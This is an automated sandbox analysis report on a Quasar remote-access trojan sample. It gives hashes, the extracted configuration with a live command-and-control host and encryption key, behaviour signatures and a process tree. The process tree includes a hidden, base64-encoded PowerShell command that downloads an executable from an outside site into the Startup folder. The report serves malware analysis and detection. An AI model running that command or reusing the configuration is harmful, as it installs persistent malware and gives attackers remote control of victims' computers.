Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/01/2025, 05:04

General

  • Target

    JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe

  • Size

    3.0MB

  • MD5

    f7bbf426b790e58d31c112ad57028727

  • SHA1

    c6c6ad699c01445d76a5e72c1890a4c77614e77a

  • SHA256

    fbd232bef38a185689126a83412f660670babd5fcd67674c698c3af1d9ccdb12

  • SHA512

    3f35132aaf069d598b66d3d87122f85beda6762a7c849ef5a3d36fd98ffae6c60367f07ba32217155082e469bdd77b2c6c0dce7fbe268dc6a4381540ba731fea

  • SSDEEP

    49152:mhNG2xCF8FythJYb7T6jNCAaYGzIKuZaonz0XdetFkMKoW4pOXs:EXC6othq7WjNCduZaWnBOX

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

ROTAZ

C2

johnnycoukiedough-32583.portmap.host:31049

Mutex

3beba8ff-20e4-4900-b227-66c42193224d

Attributes
  • encryption_key

    EF6D608E6D632DE3BE9AEFD87041D26415D93D65

  • install_name

    Office365.exe

  • log_directory

    Versions

  • reconnect_delay

    3000

  • startup_key

    StartupAssistant

  • subdirectory

    Microsoft-Office365

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Office.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Office.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start powershell - WindowStyle Hidden - enc JAB1AHMAZQByACAAPQAgACgAKABHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQApAC4AVQBzAGUAcgBuAGEAbQBlACkALgBTAHAAbABpAHQAKAAcIFwAHSApAFsAMQBdADsAIABjAGQAIAAcIEMAOgBcAHUAcwBlAHIAcwBcACQAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB0AGEAcgB0ACAATQBlAG4AdQBcAFAAcgBvAGcAcgBhAG0AcwBcAFMAdABhAHIAdAB1AHAAXAAdIDsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAcIGgAdAB0AHAAOgAvAC8AdABlAGMAaABnAGUAbgBpAGMAcwAuAG4AbAAvAFMAdABhAHIAdAB1AHAAQQBzAHMAaQBzAHQAYQBuAHQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAHCBDADoAXABVAHMAZQByAHMAXAAkAHUAcwBlAHIAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAUwB0AGEAcgB0AHUAcABBAHMAcwBpAHMAdABhAG4AdAAuAGUAeABlAB0gOwA=
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4108
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell - WindowStyle Hidden - enc JAB1AHMAZQByACAAPQAgACgAKABHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQApAC4AVQBzAGUAcgBuAGEAbQBlACkALgBTAHAAbABpAHQAKAAcIFwAHSApAFsAMQBdADsAIABjAGQAIAAcIEMAOgBcAHUAcwBlAHIAcwBcACQAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB0AGEAcgB0ACAATQBlAG4AdQBcAFAAcgBvAGcAcgBhAG0AcwBcAFMAdABhAHIAdAB1AHAAXAAdIDsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAcIGgAdAB0AHAAOgAvAC8AdABlAGMAaABnAGUAbgBpAGMAcwAuAG4AbAAvAFMAdABhAHIAdAB1AHAAQQBzAHMAaQBzAHQAYQBuAHQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAHCBDADoAXABVAHMAZQByAHMAXAAkAHUAcwBlAHIAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAUwB0AGEAcgB0AHUAcABBAHMAcwBpAHMAdABhAG4AdAAuAGUAeABlAB0gOwA=
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2848
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OFFICE~2.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OFFICE~2.EXE
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZPbNKKqhvpPc.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3416
          • C:\Windows\system32\chcp.com
            chcp 65001
            5⤵
              PID:4320
            • C:\Windows\system32\PING.EXE
              ping -n 10 localhost
              5⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:60
            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe
              "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4032
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tl5vfuwwckCh.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3324
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  7⤵
                    PID:2372
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:5044
          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\setup.exe
            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\setup.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Checks system information in the registry
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:896
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile "$package = Get-AppxPackage Microsoft.Office.Desktop -allUsers; if (!$package) { $Error.Add(\"Package is not installed\")}; if ($error.Count -eq 0) { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '1' -Encoding ascii; } else { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '0' -Encoding ascii; Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateError.scratch' -InputObject $error -Encoding ascii;} "
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3064
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile "$package = Get-AppxPackage Microsoft.Office.Desktop -allUsers; if (!$package) { $Error.Add(\"Package is not installed\")}; if ($error.Count -eq 0) { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '1' -Encoding ascii; } else { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '0' -Encoding ascii; Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateError.scratch' -InputObject $error -Encoding ascii;} "
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3032

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

        Filesize

        2KB

        MD5

        8f0271a63446aef01cf2bfc7b7c7976b

        SHA1

        b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7

        SHA256

        da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c

        SHA512

        78a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        1KB

        MD5

        7848291f9332413a0cc4d140f8250032

        SHA1

        5f3afdd8d8fb70b27cbdd894edbff6b8400e5fea

        SHA256

        2bc2bc398504fddc7b5fc4099792e87db95cacb4f59e6003cb4241cd58d23421

        SHA512

        2480d830db8e2c4aa9f4269f017afb6ef1be120ae10af46643e9cb7692a9c0a9739d2df69590011c48e44834482d332fd9288b5239e306b3438ca9e3cb5f2139

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        fc7174fbcbc4ddfd5856cb73fe45a319

        SHA1

        a2f7999597c37d4bfd99e5a04450bc42eaea1616

        SHA256

        1a97f67394d6f9907c6fc9d7cbaab5b0b0ddef681910e4adce20636eb44ee21e

        SHA512

        c41078bb809c26c09b20a599da96d8c0075a169858adea81768efb194e9b06095296afb9b3f98d6900c815b95c7f5d93751b8b7d09fb7479cd93388d12f820c5

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OFFICE~2.EXE

        Filesize

        3.0MB

        MD5

        5ba44ef6e4794a232ab680c01289ab13

        SHA1

        cbba30dd455680e31ecd27567e71f4d8459c9d1e

        SHA256

        30e4bb6f6d78d8d66e9df4b8c856cc2877096c6851be7c167ed23dff72add67e

        SHA512

        9968179e34f56e7b6b8c5b1618c0ce487a99228b0eb66aa48570fb0c5f3d6aa05b13038cfc4e4ce2815a153ab055d0070a1d0accb77935fe80a98db404d1efd5

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Office.exe

        Filesize

        52KB

        MD5

        a090e5ae660cbd87be5aaeb8996a87af

        SHA1

        418df60f5052a90e31271d32ace2f70985874e85

        SHA256

        f53b115f66670de3a58e5266a7634bd057358d929f8538e8cf27eddbd584dc89

        SHA512

        4b6c65e48afbb61ee741501e8e2893050452774b2abf91936a0d206620d29b8e38243fae8227b4ab6d1ab438f5de98eaa4b3fcfda122faff9b7b01997283657d

      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe

        Filesize

        502KB

        MD5

        de3f09bb9ec0ec30a7fc1c6c6f975498

        SHA1

        d31b7bc5b58b7ecceef42d33f469fe9f364390ca

        SHA256

        b957fbb48f0629b9abc9e55f13bf0a68c3acb8b0b7874d9baf3d9bb183d3a60b

        SHA512

        880f99d84f4a9763f43e3f8a71192b648fa0ffa8b1b6188b8335d33c16ff4687bf80f3431028e13eb29aee5f931a1c8f39a65c24799f3f8d00b3a54af007cb9d

      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\setup.exe

        Filesize

        7.1MB

        MD5

        c43fa7c24d8f0dec0c1e55dbff369fd6

        SHA1

        1c3ec971331d5dec70e6ecbad6b8a4302d5550a7

        SHA256

        aae9c94bc546d208868bc04a823ad6a716b1b4d3ad7010263b0690082e3b8da8

        SHA512

        e881481f53b55c48f3c437ac057952a27217343db261b9b9c7db0cc1777205e5d5a2a2602b80ddd33c2bd042808125f43a11816d42c785fdad9bbe0f709e8c5e

      • C:\Users\Admin\AppData\Local\Temp\Office.ValidateError.scratch

        Filesize

        26B

        MD5

        bd3457e50947d4280734e74b51b5b68d

        SHA1

        424635c6b5622a6c01a59d290a1c9ab8e593effc

        SHA256

        23d647979bc5dc186de5ba3e00a222a912ab8e4782eb6407efa70e29e95979f5

        SHA512

        e83e3615a5e94af288eb1c9b92f55e271765cc43531ec94574371debf63c0c4a58327b6fd8a4775bfba8a3234220cb0396b6d33164309a09a1d826c0689143fb

      • C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch

        Filesize

        3B

        MD5

        21438ef4b9ad4fc266b6129a2f60de29

        SHA1

        5eb8e2242eeb4f5432beeec8b873f1ab0a6b71fd

        SHA256

        13bf7b3039c63bf5a50491fa3cfd8eb4e699d1ba1436315aef9cbe5711530354

        SHA512

        37436ced85e5cd638973e716d6713257d692f9dd2e1975d5511ae3856a7b3b9f0d9e497315a058b516ab31d652ea9950938c77c1ad435ea8d4b49d73427d1237

      • C:\Users\Admin\AppData\Local\Temp\ZPbNKKqhvpPc.bat

        Filesize

        214B

        MD5

        452e2923520afdcedf4c3a5ed06fbd8f

        SHA1

        91a38e71752df70dddfcfbb6f1f743a2bdfe4444

        SHA256

        96edf286c33cd2dff24ec9a122efc4115a0371cb4a7fd11af7c5b17e7240f921

        SHA512

        6175f61485dd2e207baf070661c21fcc801cc814d0e6b2253dcb646233a88eda22ca72167257657c7a1f9ae2f45c739e2254da091bffe363a350c9167962cd1c

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbiccpst.fcy.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tl5vfuwwckCh.bat

        Filesize

        214B

        MD5

        cc78efb479dfdc33f0495d9fd3b259ca

        SHA1

        fa3f1d7b9bb0f7afd3b26a7ad5363498977c38cf

        SHA256

        665c6b80720dad302d06d7bfb73f748bc91159698b89c541e5786b58c666a259

        SHA512

        bde4a37c9c73ddbd8886a8bad2464ef7af62ef75e6b9930469c27783986f635c089614ab31de8d71bbd235aa6d75f7475f5f4059578320d089a1da90a72df634

      • memory/1516-7-0x0000000000400000-0x0000000000413000-memory.dmp

        Filesize

        76KB

      • memory/2316-39-0x000000001B410000-0x000000001B4C2000-memory.dmp

        Filesize

        712KB

      • memory/2316-37-0x00000000003A0000-0x0000000000424000-memory.dmp

        Filesize

        528KB

      • memory/2316-38-0x000000001B300000-0x000000001B350000-memory.dmp

        Filesize

        320KB

      • memory/2848-15-0x0000000005790000-0x00000000057F6000-memory.dmp

        Filesize

        408KB

      • memory/2848-14-0x0000000005090000-0x00000000050B2000-memory.dmp

        Filesize

        136KB

      • memory/2848-26-0x00000000058C0000-0x0000000005C14000-memory.dmp

        Filesize

        3.3MB

      • memory/2848-16-0x0000000005800000-0x0000000005866000-memory.dmp

        Filesize

        408KB

      • memory/2848-10-0x000000007485E000-0x000000007485F000-memory.dmp

        Filesize

        4KB

      • memory/2848-11-0x0000000002630000-0x0000000002666000-memory.dmp

        Filesize

        216KB

      • memory/2848-29-0x0000000074850000-0x0000000075000000-memory.dmp

        Filesize

        7.7MB

      • memory/2848-12-0x0000000074850000-0x0000000075000000-memory.dmp

        Filesize

        7.7MB

      • memory/2848-13-0x0000000005160000-0x0000000005788000-memory.dmp

        Filesize

        6.2MB

      • memory/3032-97-0x000000006E3D0000-0x000000006E41C000-memory.dmp

        Filesize

        304KB

      • memory/3032-91-0x0000000005A60000-0x0000000005DB4000-memory.dmp

        Filesize

        3.3MB

      • memory/3064-62-0x0000000006190000-0x00000000061DC000-memory.dmp

        Filesize

        304KB

      • memory/3064-77-0x0000000007470000-0x000000000748A000-memory.dmp

        Filesize

        104KB

      • memory/3064-78-0x0000000007630000-0x0000000007646000-memory.dmp

        Filesize

        88KB

      • memory/3064-79-0x00000000072D0000-0x00000000072DA000-memory.dmp

        Filesize

        40KB

      • memory/3064-80-0x00000000076C0000-0x00000000076E6000-memory.dmp

        Filesize

        152KB

      • memory/3064-76-0x0000000007AB0000-0x000000000812A000-memory.dmp

        Filesize

        6.5MB

      • memory/3064-75-0x00000000072F0000-0x0000000007393000-memory.dmp

        Filesize

        652KB

      • memory/3064-74-0x00000000072C0000-0x00000000072DE000-memory.dmp

        Filesize

        120KB

      • memory/3064-64-0x000000006E3D0000-0x000000006E41C000-memory.dmp

        Filesize

        304KB

      • memory/3064-63-0x00000000066D0000-0x0000000006702000-memory.dmp

        Filesize

        200KB

      • memory/3064-61-0x0000000006100000-0x000000000611E000-memory.dmp

        Filesize

        120KB

      • memory/3064-58-0x0000000005B50000-0x0000000005EA4000-memory.dmp

        Filesize

        3.3MB